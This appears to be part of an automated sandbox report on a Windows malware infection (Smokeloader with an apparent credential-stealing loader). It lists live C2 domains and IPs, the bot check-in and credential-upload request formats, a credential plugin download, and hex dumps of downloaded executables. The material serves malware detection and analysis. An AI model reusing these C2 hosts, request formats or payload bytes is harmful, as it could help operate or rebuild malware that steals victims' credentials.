                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeDomain query: o36fafs3sn6xou.com
                      Source: C:\Windows\explorer.exeDomain query: anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: hoteldostyk.com
                      Source: C:\Windows\explorer.exeDomain query: iplogger.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 89.208.107.216 80
                      Source: C:\Windows\explorer.exeDomain query: srshf.com
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: 1ecosolution.it
                      Source: C:\Windows\explorer.exeNetwork Connect: 193.56.146.168 80
                      Source: C:\Windows\explorer.exeDomain query: cdn-104.anonfiles.com
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49725 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49729 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49733 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49738 -> 89.208.107.216:80
                      Source: C:\Windows\explorer.exeDNS query: name: iplogger.com
                      Source: Malware configuration extractorURLs: 185.106.92.111:2510
                      Source: Malware configuration extractorURLs: http://o3l3roozuidudu.com/
                      Source: Malware configuration extractorURLs: http://o3npxslymcyfi2.com/
                      Source: Malware configuration extractorURLs: http://o3b1wk8sfk74tf.com/
                      Source: Malware configuration extractorURLs: https://t.me/deadftx
                      Source: Malware configuration extractorURLs: https://www.tiktok.com/@user6068972597711
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODI4MjM=Host: 193.56.146.174Content-Length: 82975Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Host: 193.56.146.174Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4877482924580855Host: 116.202.5.101Content-Length: 112010Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0787962131917872Host: 116.202.5.101Content-Length: 118534Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:09 GMTContent-Type: application/octet-streamContent-Length: 382464Last-Modified: Sat, 19 Nov 2022 09:35:01 GMTConnection: keep-aliveETag: "6378a345-5d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d3 af ec 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 22 01 00 00 b2 44 00 00 00 00 00 a5 48 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 b4 18 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 27 01 00 28 00 00 00 00 70 43 00 78 43 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a0 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 20 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 29 42 00 00 40 01 00 00 28 02 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 43 02 00 00 70 43 00 00 44 02 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 8e 42 00 00 00 c0 45 00 00 44 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 19 Nov 2022 08:37:50 GMTETag: "58000-5edcebcd5f2db"Accept-Ranges: bytesContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 f4 f8 7d 92 95 96 2e 92 95 96 2e 92 95 96 2e 8c c7 03 2e 86 95 96 2e 8c c7 15 2e cb 95 96 2e 8c c7 12 2e b5 95 96 2e 51 9a cb 2e 91 95 96 2e 92 95 97 2e cc 95 96 2e 9b ed 12 2e 93 95 96 2e 8c c7 02 2e 93 95 96 2e 9b ed 07 2e 93 95 96 2e 52 69 63 68 92 95 96 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 92 78 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 42 01 00 00 48 04 00 00 00 00 00 50 af 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 28 da 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a0 01 00 28 00 00 00 00 b0 05 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 41 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2e 48 00 00 00 60 01 00 00 4a 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f4 03 00 00 b0 01 00 00 e8 03 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 